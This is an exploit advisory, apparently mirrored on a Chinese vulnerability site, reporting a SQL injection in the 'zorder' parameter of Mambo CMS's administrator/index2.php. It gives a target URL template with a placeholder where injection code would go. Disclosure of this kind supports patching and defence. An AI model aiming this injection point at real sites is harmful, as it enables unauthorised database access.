*#################################################################### [+] Exploit Title : CMS 4.x.x Zorder (SQL Injection Vul) [+] Author : Kr4L BeNiM [+] Contact : www.facebook.com/kr4l.hacker [+] Date : November 13, 2011 [+] Software Link: http://mambo-developer.org [+] Category: Web Apps #################################################################### Vulnerability: *SQL injection Vulnerability* [#] Exploit : - The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. [#] Explaination : - http://target.com/mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder= (SQL Inj Codes) #################################################################### [+] Greets : Likuid Sky, Hax.Root, S.O.G, DjArs HaXoR, KiLLerMiNd, CyberLeeTs ####################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论